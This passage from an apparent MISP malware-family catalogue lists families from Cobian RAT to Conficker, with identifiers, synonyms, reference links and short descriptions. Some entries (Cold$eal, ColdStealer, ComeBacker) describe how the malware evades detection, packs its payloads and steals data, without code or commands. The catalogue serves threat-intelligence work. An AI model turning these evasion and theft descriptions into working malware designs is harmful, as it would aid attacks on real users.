- https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia - webarchive
- https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/ - webarchive
- https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/ - webarchive
- https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/ - webarchive
- https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/ - webarchive
- https://redcanary.com/blog/grief-ransomware/ - webarchive
- https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html - webarchive
- https://blog.group-ib.com/colunmtk_apt41 - webarchive
- https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/ - webarchive
- https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.youtube.com/watch?v=LA-XE5Jy2kU - webarchive
- https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/ - webarchive
- https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/ - webarchive
- https://www.tgsoft.it/news/news_archivio.asp?id=1568 - webarchive
- https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/ - webarchive
- https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/ - webarchive
- https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/ - webarchive
- https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-southeast-asian-firms.html - webarchive
- https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf - webarchive
- https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/ - webarchive
- https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html - webarchive
- https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/ - webarchive
- https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/ - webarchive
- https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64 - webarchive
- https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html - webarchive
- https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/ - webarchive
- https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html - webarchive
- https://cyber.wtf/2022/03/23/what-the-packer/ - webarchive
- https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html - webarchive
- https://blogs.blackberry.com/en/2021/11/zebra2104 - webarchive
- https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ - webarchive
- https://embeeresearch.io/shodan-censys-queries/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://thedfirreport.com/2024/08/26/blacksuit-ransomware/ - webarchive
- https://security.macnica.co.jp/blog/2022/05/iso.html - webarchive
- https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html - webarchive
- https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/ - webarchive
- https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/ - webarchive
- https://github.com/chronicle/GCTI - webarchive
- https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e - webarchive
- https://twitter.com/TheDFIRReport/status/1356729371931860992 - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://services.google.com/fh/files/blogs/gcat_threathorizons_full_jul2023.pdf - webarchive
- https://www.hhs.gov/sites/default/files/bazarloader.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware - webarchive
- https://github.com/Apr4h/CobaltStrikeScan - webarchive
- https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf - webarchive
- https://medium.com/@joshuapenny88/hostinghunter-series-chang-way-technologies-co-limited-a9ba4fce0f65 - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718 - webarchive
- https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/ - webarchive
- https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/ - webarchive
- https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf - webarchive
- https://hitcon.org/2023/CMT/slide/Unmasking%20CamoFei_An%20In-depth%20Analysis%20of%20an%20Emerging%20APT%20Group%20Focused%20on%20Healthcare%20Sectors%20in%20East%20Asia.pdf - webarchive
- https://www.istrosec.com/blog/apt-sk-cobalt/ - webarchive
- https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/ - webarchive
- https://www.mandiant.com/resources/sabbath-ransomware-affiliate - webarchive
- https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/ - webarchive
- https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf - webarchive
- https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b - webarchive
- https://twitter.com/Cryptolaemus1/status/1407135648528711680 - webarchive
- https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b - webarchive
- https://isc.sans.edu/diary/26752 - webarchive
- https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/ - webarchive
- https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists - webarchive
- https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack - webarchive
- https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/ - webarchive
- https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive - webarchive
- https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/ - webarchive
- https://www.youtube.com/watch?v=y65hmcLIWDY - webarchive
- https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html - webarchive
- https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/ - webarchive
- https://cert.gov.ua/article/619229 - webarchive
- https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ - webarchive
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ - webarchive
- https://www.elastic.co/security-labs/grimresource - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://community.riskiq.com/article/c88cf7e6 - webarchive
- https://www.youtube.com/watch?v=ysN-MqyIN7M - webarchive
- https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/ - webarchive
- https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7 - webarchive
- https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html - webarchive
- https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/ - webarchive
- https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - webarchive
- https://twitter.com/MBThreatIntel/status/1412518446013812737 - webarchive
- https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2 - webarchive
- https://www.mandiant.com/media/12596/download - webarchive
- https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf - webarchive
- https://isc.sans.edu/diary/rss/28664 - webarchive
- https://redcanary.com/blog/getsystem-offsec/ - webarchive
- https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ - webarchive
- https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/ - webarchive
- https://www.arashparsa.com/hook-heaps-and-live-free/ - webarchive
- https://twitter.com/AltShiftPrtScn/status/1385103712918642688 - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/ - webarchive
- https://www.ironnet.com/blog/ransomware-graphic-blog - webarchive
- https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting - webarchive
- https://asec.ahnlab.com/en/34549/ - webarchive
- https://zero.bs/cobaltstrike-beacons-analyzed.html - webarchive
- https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors - webarchive
- https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/ - webarchive
- https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g - webarchive
- https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903 - webarchive
- https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications - webarchive
- https://malwarelab.eu/posts/fin6-cobalt-strike/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/ - webarchive
- https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/ - webarchive
- https://twitter.com/MsftSecIntel/status/1522690116979855360 - webarchive
- https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html - webarchive
- https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation - webarchive
- https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage - webarchive
- http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa - webarchive
- https://socprime.com/blog/picassoloader-and-cobalt-strike-beacon-detection-uac-0057-aka-ghostwriter-hacking-group-attacks-the-ukrainian-leading-military-educational-institution/ - webarchive
- https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/ - webarchive
- https://isc.sans.edu/diary/rss/28448 - webarchive
- https://thedfirreport.com/2021/05/12/conti-ransomware/ - webarchive
- https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv - webarchive
- https://twitter.com/VK_Intel/status/1294320579311435776 - webarchive
- https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-dupont - webarchive
- https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire - webarchive
- https://embee-research.ghost.io/malware-analysis-decoding-a-simple-hta-loader/ - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/ - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cobian RAT
Internal MISP references
UUID aa553bbd-f6e4-4774-9ec5-4607aa2004b8
which can be used as unique global reference for Cobian RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat - webarchive
- https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/ - webarchive
- https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html - webarchive
- https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat - webarchive
- https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CobInt
CobInt is a self-developed backdoor of the Cobalt group. The modular tool can collect initial reconnaissance information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor downloads and launches a CobaltStrike framework stager. Its CRM mailslot module was also observed being downloaded by ISFB.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CobInt.
Known Synonyms |
---|
COOLPANTS |
Internal MISP references
UUID 23160942-6de6-41c0-8d8c-44876191c3f0
which can be used as unique global reference for CobInt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint - webarchive
- https://asert.arbornetworks.com/double-the-infection-double-the-fun/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.netscout.com/blog/asert/double-infection-double-fun - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://www.group-ib.com/blog/renaissance - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cobra Carbon System
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cobra Carbon System.
Known Synonyms |
---|
Carbon |
Internal MISP references
UUID f75452f3-6a4a-4cd6-b3e0-089fa320e9b9
which can be used as unique global reference for Cobra Carbon System
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra - webarchive
- https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra - webarchive
- https://securelist.com/shedding-skin-turlas-fresh-faces/88069/ - webarchive
- https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf - webarchive
- https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a - webarchive
- https://www.youtube.com/watch?v=FttiysUZmDw - webarchive
- https://securelist.com/analysis/publications/65545/the-epic-turla-operation/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity - webarchive
- https://github.com/hfiref0x/TDL - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hunter - webarchive
- https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf - webarchive
- https://docs.broadcom.com/doc/waterbug-attack-group - webarchive
- https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/ - webarchive
- https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon - webarchive
- https://www.circl.lu/pub/tr-25/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CockBlocker
Internal MISP references
UUID 77e85a95-6a78-4255-915a-488eb73ee82f
which can be used as unique global reference for CockBlocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CodeKey
Internal MISP references
UUID cb5bad79-707c-493d-8a2b-4c0be38301c5
which can be used as unique global reference for CodeKey
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CodeCore
Ransomware.
Internal MISP references
UUID 3952f4e0-0621-4bc3-bc6f-a848e0e49bd1
which can be used as unique global reference for CodeCore
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cohhoc
Internal MISP references
UUID 9481d7b1-307c-4504-9333-21720b85317b
which can be used as unique global reference for Cohhoc
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Coinminer
Coinminer is unwanted malicious software that uses the victim's computational resources (mostly CPU and RAM) to mine cryptocurrency (for example Monero or Zcash). The malware achieves persistence by registering one of the open-source miners to run on startup without the victim's consent. More sophisticated coin miners use timer settings or cap their CPU usage in order to remain stealthy.
Internal MISP references
UUID 333e2e87-b9b0-4e2e-9ed9-7259c55a93db
which can be used as unique global reference for Coinminer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer - webarchive
- https://www.triskelelabs.com/investigating-monero-coin-miner - webarchive
- https://secrary.com/ReversingMalware/CoinMiner/ - webarchive
- https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/ - webarchive
- https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
coldbrew
Internal MISP references
UUID b30a19b2-383b-4ca5-a047-00910b8a3e03
which can be used as unique global reference for coldbrew
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ColdLock
Internal MISP references
UUID 140f271b-0be1-4455-96c6-015632ade33a
which can be used as unique global reference for ColdLock
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.coldlock - webarchive
- https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html - webarchive
- https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cold$eal
Cold$eal is a packer for encrypting ("sealing") malware. It contains some AV-evasion techniques as well as some sandbox detection. It was developed by $@dok (aka Sadok aka Coldseal). It was available as a cryptor service under the URL coldseal.us and was later sold as a toolkit consisting of the cryptor and a custom-made cryptostub, including a FUD guarantee backed by free updates to the cryptostub. The payload was encrypted using RC4 and added to the cryptostub as a resource. The encryption key itself was stored inside the resource as well. On start, the cryptostub extracts the key, decrypts the payload and performs a self-injection of the now decrypted payload. Note: the packed sample provided contains a harmless payload, while the unpacked sample is the bare cryptostub without a payload.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cold$eal.
Known Synonyms |
---|
ColdSeal |
Internal MISP references
UUID 8d5b7766-673c-493f-b760-65afd61689cb
which can be used as unique global reference for Cold$eal
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal - webarchive
- https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html - webarchive
- https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/ - webarchive
- https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html - webarchive
- https://www.youtube.com/watch?v=242Tn0IL2jE - webarchive
- http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ColdStealer
ColdStealer is a relatively new malicious program that was discovered in 2022. Like many other stealers, its main purpose is to steal credentials and information from web browsers, in addition to stealing cryptocurrency wallets, FTP credentials, various files and information about the system such as OS version, system language, processor type and clipboard data. When the infostealer collects the information to be stolen, it assembles it as a ZIP archive in memory rather than writing files to disk. This helps the malware evade detection, as it leaves no file traces of its execution. The only known method of delivering stolen information to the cybercriminals is sending the ZIP archive to the hardcoded command and control (C2) server.
Internal MISP references
UUID 5869f846-adf8-4798-833e-54c05f9b30f6
which can be used as unique global reference for ColdStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Colibri Loader
According to CloudSEK, Colibri Loader is a form of malware designed to facilitate the installation of additional malware on an already compromised system. This loader employs various techniques to evade detection, such as omitting the Import Address Table (IAT) and using encrypted strings to complicate analysis. Like other loader malware, Colibri can be used to deploy information-stealing malware, potentially leading to significant loss of sensitive data. As a result, users should exercise caution when encountering unfamiliar files on their systems.
Internal MISP references
UUID 09926538-a7a0-413b-bc7d-4b20a8f4b515
which can be used as unique global reference for Colibri Loader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri - webarchive
- https://fr3d.hk/blog/colibri-loader-back-to-basics - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf - webarchive
- https://github.com/Casperinous/colibri_loader - webarchive
- https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/ - webarchive
- https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Collection RAT
Internal MISP references
UUID 6c6570f3-b407-458f-bb83-647c0b1f5dd9
which can be used as unique global reference for Collection RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CollectorGoomba
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CollectorGoomba.
Known Synonyms |
---|
Collector Stealer |
Internal MISP references
UUID 5c0f96fd-54c0-44cd-9caf-b986e3fa2879
which can be used as unique global reference for CollectorGoomba
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba - webarchive
- https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html - webarchive
- https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Colony
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Colony.
Known Synonyms |
---|
Bandios |
GrayBird |
Internal MISP references
UUID 4db94d24-209a-4edd-b175-3a3085739b94
which can be used as unique global reference for Colony
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Combojack
Internal MISP references
UUID 150cde2c-ae36-4fa5-8d8d-8dedc3de43de
which can be used as unique global reference for Combojack
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Combos
Internal MISP references
UUID 2b71a966-da08-4467-a785-cb6abf2fa65e
which can be used as unique global reference for Combos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ComeBacker
ComeBacker was found in a backdoored Visual Studio project that was used to target security researchers in Q4 2020 and early 2021.
It is an HTTP(S) downloader.
It uses the AES CBC cipher, implemented through OpenSSL's EVP interface, to decrypt its configuration and to encrypt and decrypt the client-server communication.
The parameter names in the client's HTTP POST requests are generated randomly. For the initial connection, the client exchanges keys with the server via the Diffie–Hellman key agreement protocol over the elliptic curve secp521r1. The client generates a random 32-byte private key, and the server responds with its public key in a buffer starting with the wide character "0".
Next, the client sends the current local time, and the server responds with a buffer containing multiple values separated by the pipe symbol. The typical values are the encrypted payload, the export to execute, and the MD5 hash of the decrypted DLL, which is used to verify the authenticity of the payload.
There are variants of ComeBacker without statically linked OpenSSL. In those variants, the key exchange is omitted and AES CBC is replaced with HC-256.
Internal MISP references
UUID 44240b4b-09d3-4b6b-a077-bce00c35ea38
which can be used as unique global reference for ComeBacker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker - webarchive
- https://download.hauri.net/DownSource/down/dwn_detail_down.html?uid=55 - webarchive
- https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf - webarchive
- http://blog.nsfocus.net/stumbzarus-apt-lazarus/ - webarchive
- https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ - webarchive
- https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/ - webarchive
- https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/ - webarchive
- https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/ - webarchive
- https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/ - webarchive
- https://www.anquanke.com/post/id/230161 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Comfoo
Internal MISP references
UUID f5044eda-3119-4fcf-b8af-9b56ab66b9be
which can be used as unique global reference for Comfoo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ComLook
ComLook is a malicious plugin for the mail client "The Bat!", written in C++ and compiled with MSVC 10.0. It implements malicious commands like PutFile, GetFile, SetConfig, GetConfig, and Command. It contains hard-coded email addresses and other information, indicating a target in Azerbaijan. It was first uploaded to VirusTotal on January 12, 2022, and is associated with the APT group Turla. It appears to be a targeted deployment.
Internal MISP references
UUID 7726de54-95cc-4783-b26f-79882f0f6cba
which can be used as unique global reference for ComLook
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CommonMagic
Internal MISP references
UUID 600b553b-660b-4bbd-9c5d-4e91af9d276a
which can be used as unique global reference for CommonMagic
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ComodoSec
Internal MISP references
UUID bdecbbe9-7646-40cd-a9f3-86a20b13e6da
which can be used as unique global reference for ComodoSec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
COMpfun
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular COMpfun.
Known Synonyms |
---|
Reductor RAT |
Internal MISP references
UUID 541d5642-0648-4b5a-97b9-81110f273771
which can be used as unique global reference for COMpfun
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun - webarchive
- https://securelist.com/compfun-http-status-based-trojan/96874/ - webarchive
- https://securelist.com/compfun-successor-reductor/93633/ - webarchive
- https://securelist.com/it-threat-evolution-q2-2020/98230 - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Computrace
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Computrace.
Known Synonyms |
---|
lojack |
Internal MISP references
UUID d24882f9-8645-4f6a-8a86-2f85daaad685
which can be used as unique global reference for Computrace
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace - webarchive
- https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/ - webarchive
- https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- https://asert.arbornetworks.com/lojack-becomes-a-double-agent/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ComradeCircle
Internal MISP references
UUID 634f1977-6cba-4ad7-9501-09e1eaefde56
which can be used as unique global reference for ComradeCircle
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
concealment_troy
Internal MISP references
UUID db370ffc-c3d2-42fc-b45b-f777d69f98c5
which can be used as unique global reference for concealment_troy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Conficker
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Conficker.
Known Synonyms |
---|
Kido |
downadup |
traffic converter |
Internal MISP references
UUID 5f638985-49e1-4059-b2eb-f2ffa397b212
which can be used as unique global reference for Conficker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker - webarchive
- https://redcanary.com/blog/intelligence-insights-january-2022/ - webarchive
